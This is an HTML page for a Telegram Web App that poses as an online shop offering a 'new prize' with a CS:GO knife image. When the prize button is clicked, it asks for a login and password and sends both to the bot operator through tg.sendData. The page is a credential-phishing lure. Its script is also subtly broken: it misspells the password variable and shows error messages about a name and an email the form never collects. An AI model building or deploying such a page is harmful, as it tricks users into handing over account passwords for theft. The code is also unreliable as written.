<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Info</title>
  <script src="main.js"></script>
  <style>
  @import url(https://fonts.googleapis.com/css?family=Montserrat;wght@200;500&display=swap);

  * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
  }

  body {
      font-family: 'Montserrat', sans-serif;
      font-weight: 200;
      color: var(--tg-theme-text-color);
      background: var(--tg-theme-bg-color);
  }

  #main {
      width: 100%;
      padding: 20px;
      text-align: center;
  }
  h1 {
      margin-top: 70px;
      margin-bottom: 10px;
  }
  img {
      width: 70px;
      margin:30px auto;
  }
  p {
      width: 350px;
      margin: 0 auto;
  }

  button {
      border: 0;
      border-radius: 5px;
      margin-top: 50px;
      height: 60px;
      width: 200px;
      font-size: 20px;
      font-weight: 500;
      cursor: pointer;
      transition: all 500ms ease;
      color: var(--tg-theme-button-color);
      background: var(--tg-theme-button-text-color);
  }

  button:hover{
      background: var(--tg-theme-secondary-bg-color);
  }

  #form {
    display: none;
    text-align: center;
  }

  input {
    width: 90%;
    outline: none;
    margin: 10px 5%;
    padding: 15px 10px;
    font-size: 14px;
    border: 2px solid silver;
    border-radius: 5px;
  }

  input:focus {
    border-color: #db5d5d;
  }
  </style>
</head>
<body>
  <header>
    <div id="main">
      <h1>Онлайн магазин</h1>
      <img src="https://www.pikpng.com/pngl/m/115-1151733_pro-knife-cs-go-case-vector-clipart.png">
      <p>You have a new prize</p>
      <button id="buy">Get a prize</button>
    </div>
    <form id="form">
      <input type="text" placeholder="Login" id="user_login">
      <input type="text" placeholder="Password" id="user_password">
      <!-- <input type="text" placeholder="Телефон" id="user_phone"> -->
      <div id="error"></div>
      <button id="order">Оформить</button>
    </form>
    <script src="https://telegram.org/js/telegram-web-app.js"></script>
    <script>
      let tg = window.Telegram.WebApp;
      let buy = document.getElementById("buy");
      let order = document.getElementById("order");
      tg.expand();

      buy.addEventListener("click", () => {
        document.getElementById("main").style.display = "none";
        document.getElementById("form").style.display = "block";
        // document.getElementById("user_name").value = tg.initDataUnsafe.user.first_name + " " + tg.initDataUnsafe.user.last_name;
      });
      
      order.addEventListener("click", () => {
        document.getElementById("error").innerText = '';
        let login = document.getElementById("user_login").value;
        let pasword = document.getElementById("user_password").value;
        // let phone = document.getElementById("user_phone").value;
        if(login.length < 4) {
          document.getElementById("error").innerText = 'Ошибка в имени';
          return;
        }
        if(password.length < 5) {
          document.getElementById("error").innerText = 'Ошибка в email';
          return;
        }
        
        let data = {
          login: login,
          pasword: password
        }
        tg.sendData(JSON.stringify(data));

        tg.close();
      });
    </script>
  </header>
<body>
